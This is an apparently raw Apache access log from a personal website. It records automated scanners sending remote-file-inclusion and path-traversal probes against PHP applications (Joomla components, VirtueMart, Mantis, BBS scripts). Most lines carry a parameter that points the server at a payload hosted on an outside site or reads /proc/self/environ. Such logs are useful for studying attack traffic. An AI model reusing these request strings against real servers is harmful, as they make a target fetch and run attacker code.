210.205.6.233 - - [21/Feb/2010:05:15:21 -0800] "GET /logs//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:21 -0800] "GET /logs/access.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:15:22 -0800] "GET /logs/access_100124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:25 -0800] "GET /com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:25 -0800] "GET /logs//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:25 -0800] "GET /logs/access.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:15:51 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:15:51 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:15:51 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:15:58 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:16:06 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:16:06 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:16:06 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:16:06 -0800] "GET /logs/access_100115.log%20%20//e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:16:06 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:16:12 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:16:13 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:16:44 -0800] "GET /logs/access_100205.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:16:46 -0800] "GET /logs/access_100205.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:16:56 -0800] "GET /logs/access_100205.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:17:01 -0800] "GET /logs/access_100205.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:42 -0800] "GET /logs/access_100118.log/mantis/login_page.php?g_meta_include_file=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:42 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:42 -0800] "GET /logs/access_100118.log/mantis/login_page.php?g_meta_include_file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:42 -0800] "GET /mantis/login_page.php?g_meta_include_file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:43 -0800] "GET /logs/access_100118.log/mantis/login_page.php?g_meta_include_file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:43 -0800] "GET /mantis/login_page.php?g_meta_include_file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:43 -0800] "GET /logs/access_100118.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:18:43 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:20:05 -0800] "GET /logs/access_100117.log/mantis/login_page.php?g_meta_include_file=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:20:06 -0800] "GET /logs/access_100117.log/mantis/login_page.php?g_meta_include_file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:20:06 -0800] "GET /logs/access_100117.log/mantis/login_page.php?g_meta_include_file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
91.121.172.134 - - [21/Feb/2010:05:20:06 -0800] "GET /logs/access_100117.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:31 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:31 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:33 -0800] "GET /logs/access_100119.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:36 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:36 -0800] "GET /logs/access_100111.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:36 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:21:36 -0800] "GET /logs/access_100119.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:22:38 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:22:38 -0800] "GET /logs/access_100124.log//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:22:42 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:24:12 -0800] "GET /logs/access_100122.log//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:29 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:32 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:32 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:43 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:47 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:50 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:56 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:25:56 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:26:02 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:26:14 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:26:24 -0800] "GET /logs/access_100124.log//e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:27:05 -0800] "GET /logs/access_100124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:34 -0800] "GET /errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:34 -0800] "GET /logs//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:35 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:35 -0800] "GET /logs/access_100210.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:27:55 -0800] "GET /logs/access_100124.log%20%20//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:27:55 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:27:55 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:55 -0800] "GET /errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:56 -0800] "GET /logs//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:56 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:27:56 -0800] "GET /logs/access_100210.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:31:09 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:05:31:11 -0800] "GET /logs/access_100122.log%20%20//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:31:16 -0800] "GET /htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:31:16 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:31:26 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:32:47 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:32:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:32:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
67.195.114.36 - - [21/Feb/2010:05:33:10 -0800] "GET /pictures HTTP/1.0" 301 73 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:05:33:11 -0800] "GET /pictures/ HTTP/1.0" 200 7797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:05:33:12 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/pictures/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:05:33:13 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/pictures/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
78.110.50.102 - - [21/Feb/2010:05:33:28 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:33:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:33:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.0" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:34:04 -0800] "GET /errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:34:04 -0800] "GET /logs//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:34:05 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:34:05 -0800] "GET /logs/access_100210.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:23 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:23 -0800] "GET /htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:23 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:46 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:48 -0800] "GET /htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:48 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:34:49 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:35:11 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:35:30 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:35:30 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:35:30 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:36:01 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:36:01 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:36:02 -0800] "GET /logs/access_100207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:36:34 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:36:39 -0800] "GET /http://www.import-et-export.fr//components/com_virtuemart/rs.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
